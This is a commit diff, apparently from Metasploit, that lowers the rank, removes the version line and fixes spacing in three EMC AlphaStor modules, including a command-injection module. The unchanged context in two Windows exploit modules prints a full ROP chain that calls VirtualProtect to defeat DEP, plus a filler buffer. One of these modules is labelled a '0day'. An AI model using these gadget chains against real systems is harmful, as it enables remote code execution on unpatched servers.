Skip to content

Commit 7e2d474

Browse files
committed
Ranking, Version, Spacing Edit
1 parent 7587997 commit 7e2d474

File tree

3 files changed

+48
-51
lines changed

3 files changed

+48
-51
lines changed

modules/auxiliary/server/emc_alphastor_75_cmd_injection.rb

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,6 @@ def initialize(info = {})
2020
'Brent Morris' # [email protected]
2121
],
2222
'License' => MSF_LICENSE,
23-
'Version' => '$Revision: $',
2423
'References' =>
2524
[
2625
[ 'CVE', '2013-0928' ],

modules/exploits/windows/emc/emc_alphastor_41.rb

Lines changed: 24 additions & 25 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
require 'msf/core'
22

33
class Metasploit3 < Msf::Exploit::Remote
4-
Rank = GreatRanking
4+
Rank = NormalRanking
55

66
include Msf::Exploit::Remote::Tcp
77

@@ -22,7 +22,6 @@ def initialize(info = {})
2222
'Mohsan Farid' # [email protected]
2323
],
2424
'License' => MSF_LICENSE,
25-
'Version' => '$Revision: $',
2625
'References' =>
2726
[
2827
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-035/' ]
@@ -74,29 +73,29 @@ def exploit
7473
# 96 bytes
7574
rop = [
7675
0x77bb2563, # pop eax/ retn
77-
0x77ba1114, # ptr to kernel32!virtualprotect
78-
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
79-
0xfeedface,
80-
0x77bb0c86, # xchg eax, esi/ retn
81-
0x77bc9801, # pop ebp/ retn
82-
0x77be2265,
83-
0x77bb2563, # pop eax/ retn
84-
0x03C0990F,
85-
0x77bdd441, # sub eax, 3c0940fh/ retn
86-
0x77bb48d3, # pop eax/ retn
87-
0x77bf21e0,
88-
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
89-
0x77bbfc02, # pop ecx/ retn
90-
0x77bef001,
91-
0x77bd8c04, # pop edi/ retn
92-
0x77bd8c05,
93-
0x77bb2563, # pop eax/ retn
94-
0x03c0984f,
95-
0x77bdd441, # sub eax, 3c0940fh/ retn
96-
0x77bb8285, # xchg eax, edx/ retn
97-
0x77bb2563, # pop eax/ retn
98-
0x90909090,
99-
0x77be6591, # pushad/ add al, 0efh/ retn
76+
0x77ba1114, # ptr to kernel32!virtualprotect
77+
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
78+
0xfeedface,
79+
0x77bb0c86, # xchg eax, esi/ retn
80+
0x77bc9801, # pop ebp/ retn
81+
0x77be2265,
82+
0x77bb2563, # pop eax/ retn
83+
0x03C0990F,
84+
0x77bdd441, # sub eax, 3c0940fh/ retn
85+
0x77bb48d3, # pop eax/ retn
86+
0x77bf21e0,
87+
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
88+
0x77bbfc02, # pop ecx/ retn
89+
0x77bef001,
90+
0x77bd8c04, # pop edi/ retn
91+
0x77bd8c05,
92+
0x77bb2563, # pop eax/ retn
93+
0x03c0984f,
94+
0x77bdd441, # sub eax, 3c0940fh/ retn
95+
0x77bb8285, # xchg eax, edx/ retn
96+
0x77bb2563, # pop eax/ retn
97+
0x90909090,
98+
0x77be6591, # pushad/ add al, 0efh/ retn
10099
].pack("V*")
101100

102101
buf = "\xcc" * 550

modules/exploits/windows/emc/emc_alphastor_72.rb

Lines changed: 24 additions & 25 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
require 'msf/core'
22

33
class Metasploit3 < Msf::Exploit::Remote
4-
Rank = GreatRanking
4+
Rank = NormalRanking
55

66
include Msf::Exploit::Remote::Tcp
77

@@ -22,7 +22,6 @@ def initialize(info = {})
2222
'Brent Morris' # [email protected]
2323
],
2424
'License' => MSF_LICENSE,
25-
'Version' => '$Revision: $',
2625
'References' =>
2726
[
2827
[ 'URL', '0day' ],
@@ -72,29 +71,29 @@ def exploit
7271
# 96 bytes
7372
rop = [
7473
0x77bb2563, # pop eax/ retn
75-
0x77ba1114, # ptr to kernel32!virtualprotect
76-
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
77-
0xfeedface,
78-
0x77bb0c86, # xchg eax, esi/ retn
79-
0x77bc9801, # pop ebp/ retn
80-
0x77be2265,
81-
0x77bb2563, # pop eax/ retn
82-
0x03C0990F,
83-
0x77bdd441, # sub eax, 3c0940fh/ retn
84-
0x77bb48d3, # pop eax/ retn
85-
0x77bf21e0,
86-
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
87-
0x77bbfc02, # pop ecx/ retn
88-
0x77bef001,
89-
0x77bd8c04, # pop edi/ retn
90-
0x77bd8c05,
91-
0x77bb2563, # pop eax/ retn
92-
0x03c0984f,
93-
0x77bdd441, # sub eax, 3c0940fh/ retn
94-
0x77bb8285, # xchg eax, edx/ retn
95-
0x77bb2563, # pop eax/ retn
96-
0x90909090,
97-
0x77be6591, # pushad/ add al, 0efh/ retn
74+
0x77ba1114, # ptr to kernel32!virtualprotect
75+
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
76+
0xfeedface,
77+
0x77bb0c86, # xchg eax, esi/ retn
78+
0x77bc9801, # pop ebp/ retn
79+
0x77be2265,
80+
0x77bb2563, # pop eax/ retn
81+
0x03C0990F,
82+
0x77bdd441, # sub eax, 3c0940fh/ retn
83+
0x77bb48d3, # pop eax/ retn
84+
0x77bf21e0,
85+
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
86+
0x77bbfc02, # pop ecx/ retn
87+
0x77bef001,
88+
0x77bd8c04, # pop edi/ retn
89+
0x77bd8c05,
90+
0x77bb2563, # pop eax/ retn
91+
0x03c0984f,
92+
0x77bdd441, # sub eax, 3c0940fh/ retn
93+
0x77bb8285, # xchg eax, edx/ retn
94+
0x77bb2563, # pop eax/ retn
95+
0x90909090,
96+
0x77be6591, # pushad/ add al, 0efh/ retn
9897
].pack("V*")
9998

10099
buf = "\xcc" * 550

0 commit comments

Comments
 (0)